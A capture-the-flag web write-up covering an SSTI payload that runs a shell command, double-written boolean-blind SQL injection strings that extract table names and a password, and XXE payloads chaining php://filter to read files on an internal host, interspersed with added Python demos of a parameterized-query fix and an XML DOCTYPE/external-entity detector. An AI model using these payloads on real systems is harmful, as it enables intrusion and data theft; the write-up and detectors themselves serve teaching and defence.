3rd 古剑山 CTF Writeup: Web

baby_ssti

Unfiltered SSTI; the flag is in the current directory. Nothing much to say.

Payload:

{{config.__class__.__init__.__globals__['os'].popen('cat flag.txt').read()}}

CMS

I hadn't seen a challenge like this before; it felt like doing a pentest. The shared target instance also loaded far too slowly, so I had no desire to write a script.

The entry point is a login page. Testing showed it was SQL injection. When attempting injection, "or" and "select" were replaced with the empty string, which is bypassed by double-writing the keyword. The only responses are an "error" message and a blank page on success, so this is boolean-based blind injection. Since loading was so slow I didn't write a script and just brute-forced with Burp. At first, brute-forcing by ASCII code seemed too tedious, so I compared characters directly, which caused a hiccup later when extracting the password: because the comparison is case-insensitive I could only recover the letters without knowing their case, and after going in circles I switched to ASCII codes and found that the trailing part was uppercase.

Extracting the database name:

admin' oorr (case when (substr(database(),1,1)='h') then 1 else (selselectect 1 union selselectect 2) end)#

heavysql

[Screenshot: 古剑山-1]

Extracting the table name:

username=admin' oorr (case when (mid((selselectect table_name from infoorrmation_schema.tables where table_schema=database() limit 0,1),1,1)='u') then 1 else (selselectect 1 union selselectect 2) end)#&password=a

users

[Screenshot: 古剑山-2]

Extracting the column names:

username=admin' oorr (case when (mid((selselectect column_name from infoorrmation_schema.columns where table_name='users' limit 0,1),1,1)='i') then 1 else (selselectect 1 union selselectect 2) end)#&password=a

id,username,password,user,current_connections

[Screenshot: 古剑山-3]

[Screenshot: 古剑山-4]

Extracting the data:

ASCII codes have to be used here because the comparison is case-insensitive.

username=admin' oorr (case when (oorrd(mid((selselectect passwoorrd from users limit 0,1),1,1))=97) then 1 else (selselectect 1 union selselectect 2) end)#&password=a

kingdom123ABC

[Screenshot: 古剑山-5]
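Added example, not code from the writeup or the challenge: a small SQLite model of the login described above. The keyword stripper is a constructed stand-in for the challenge's filter (whose real code is not on the page) and shows why double-writing survives a single replacement pass; the bound-parameter login beside it is the fix. The table, account and password are constructed. The probe uses SQLite's `--` comment instead of MySQL's `#`, and a non-existent username so the OR branch decides the outcome, because SQLite does not raise the "subquery returns more than one row" error that the writeup's else branch relies on.

```python
import re
import sqlite3

# Constructed stand-in for the filter the writeup describes: "or" and "select"
# are replaced with the empty string in a single pass, case-insensitively.
KEYWORDS = re.compile(r"or|select", re.IGNORECASE)


def naive_keyword_filter(value: str) -> str:
    """Single-pass keyword removal: 'oorr' -> 'or', 'selselectect' -> 'select'."""
    return KEYWORDS.sub("", value)


def make_db() -> sqlite3.Connection:
    """Constructed sample database with one account (not the challenge's data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.execute(
        "INSERT INTO users (username, password) VALUES ('admin', 'Sample_Pw_1')"
    )
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """'Before' form: blacklist filter plus string concatenation.

    True on a row match, False on no match or on a SQL error. Those two
    observable states are exactly the oracle a boolean-blind injection needs.
    """
    sql = "SELECT id FROM users WHERE username='%s' AND password='%s'" % (
        naive_keyword_filter(username),
        naive_keyword_filter(password),
    )
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def safe_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened form: bound parameters. Input is data, never SQL, so no
    keyword filtering is needed and double-writing has nothing to bypass."""
    row = conn.execute(
        "SELECT id FROM users WHERE username=? AND password=?", (username, password)
    ).fetchone()
    return row is not None


def boolean_probe(guess: str) -> str:
    """Double-written boolean probe in the style of the writeup, adapted to
    SQLite (-- comment). 'nobody' does not exist, so the OR branch decides:
    a correct first-letter guess logs in, a wrong one does not."""
    return (
        "nobody' oorr (case when (substr((selselectect username from users "
        "limit 1),1,1)='%s') then 1 else 0 end)-- " % guess
    )


if __name__ == "__main__":
    conn = make_db()
    print(naive_keyword_filter("oorr"), naive_keyword_filter("selselectect"))
    for g in "ab":
        print(g, "vulnerable:", vulnerable_login(conn, boolean_probe(g), "x"),
              "safe:", safe_login(conn, boolean_probe(g), "x"))
    # A classic comment-based bypass needs no keyword at all, so even a
    # filter applied to a fixed point would not save the concatenated query.
    print("admin'-- ", vulnerable_login(conn, "admin'-- ", "x"))
```

The last line of the demo is the point for defenders: the bypass `admin'-- ` contains neither "or" nor "select", so no amount of keyword stripping fixes the concatenated query. The parameterized `safe_login` treats the same strings as opaque values and returns False for every probe.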

After logging in there is an XXE. I searched for ages without finding the flag; /proc/net/arp showed there was also an internal network. I really hadn't run into this before and spent too long looking; a little faster and I could have taken first blood :(

Read the contents of index.php directly:

<!DOCTYPE ANY[<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=http://172.17.0.3/index.php">]><ANY><name>&xxe;</name></ANY>

Response:

Cjw/cGhwCiAgICBlcnJvcl9yZXBvcnRpbmcoMCk7CiAgICBpbmNsdWRlICJmbGFnLnBocCI7CiAgICBpZighJF9HRVRbJ2ZpbGUnXSkKICAgIHsKICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCIuL2luZGV4LnBocCIpOwogICAgfQogICAgJGZpbGU9JF9HRVRbJ2ZpbGUnXTsKICAgIGlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpCiAgICB7CiAgICAgICAgZWNobyAiT2ggbm8hIjsKICAgICAgICBleGl0KCk7CiAgICB9CiAgICBpbmNsdWRlKCRmaWxlKTsKPz4=

[Screenshot: 古剑山-6]

Read flag.php directly through the php://filter pseudo-protocol:
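Added example, not code from the writeup or the challenge: the server-side check that would have stopped the request above. An endpoint that only expects plain elements has no business accepting a DTD, so the check rejects any DOCTYPE before the document reaches the parser, and separately reports each external (SYSTEM/PUBLIC) entity with its URI so the rejection can be logged with the scheme involved (here `php://`, which in libxml reaches PHP stream wrappers rather than a public DTD). The XXE request body is the one from the writeup; the benign document and the scheme list are constructed.

```python
import re
import xml.etree.ElementTree as ET

# The XXE request body from the writeup, used here as the hostile test vector.
XXE_SAMPLE = (
    b'<!DOCTYPE ANY[<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/'
    b'resource=http://172.17.0.3/index.php">]><ANY><name>&xxe;</name></ANY>'
)

# Constructed benign document of the same shape the endpoint expects.
BENIGN_SAMPLE = b"<ANY><name>alice</name></ANY>"

# Any DOCTYPE is grounds for rejection on an endpoint that never needs a DTD.
DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)

# Pulls out each external entity declaration: name, SYSTEM/PUBLIC, first
# quoted literal (the URI for SYSTEM; the public ID for PUBLIC).
ENTITY_RE = re.compile(
    rb"<!ENTITY\s+(?:%\s+)?(\S+)\s+(SYSTEM|PUBLIC)\s+([\"'])(.*?)\3",
    re.IGNORECASE | re.DOTALL,
)

# Constructed list of schemes a libxml-based loader would resolve to local
# files, stream wrappers or network hosts rather than a public DTD.
RISKY_SCHEMES = {b"file", b"php", b"http", b"https", b"ftp", b"gopher", b"expect"}


def audit_xml(doc: bytes) -> list[str]:
    """Return human-readable findings for logging; an empty list means 'plain XML'."""
    findings = []
    if DOCTYPE_RE.search(doc):
        findings.append("DOCTYPE declaration present")
    for m in ENTITY_RE.finditer(doc):
        name, kind, literal = m.group(1).decode(), m.group(2).upper(), m.group(4)
        findings.append(f"external entity {name} declared {kind.decode()} {literal.decode()}")
        if kind == b"SYSTEM":
            scheme = literal.split(b":", 1)[0].lower()
            if scheme in RISKY_SCHEMES:
                findings.append(f"entity {name} uses scheme {scheme.decode()}://")
    return findings


def parse_untrusted(doc: bytes) -> ET.Element:
    """Gate before parsing: only DTD-free documents reach the XML parser."""
    findings = audit_xml(doc)
    if findings:
        raise ValueError("rejected XML: " + "; ".join(findings))
    return ET.fromstring(doc)


def is_rejected(doc: bytes) -> bool:
    """Convenience wrapper returning the gate's decision as a boolean."""
    try:
        parse_untrusted(doc)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_SAMPLE), ("xxe", XXE_SAMPLE)):
        print(label, "rejected:", is_rejected(sample), audit_xml(sample))
```

In PHP itself the equivalent hardening is to never pass LIBXML_NOENT to simplexml_load_string() or DOMDocument::loadXML(), and on libxml older than 2.9 to call libxml_disable_entity_loader(true) before parsing; the pre-parse gate above adds the log line that tells a responder which scheme the entity pointed at.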

<!DOCTYPE ANY[<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=http://172.17.0.3/index.php?file=php://filter/read=convert.base64-encode/resource=flag.php">]><ANY><name>&xxe;</name></ANY>

Which returns:

ClBEOXdhSEFnQ2k4dlpXTm9ieUFpWm14aFozczFNR1k0TkdSaFpqTmhObVJtWkRaaE9XWXlNR001WmpobFpqUXlPRGswTW4waU93by9QZ29L

Base64-decode it twice (once for the outer filter, once for the inner one):

[Screenshot: 古剑山-7]

[Screenshot: 古剑山-8]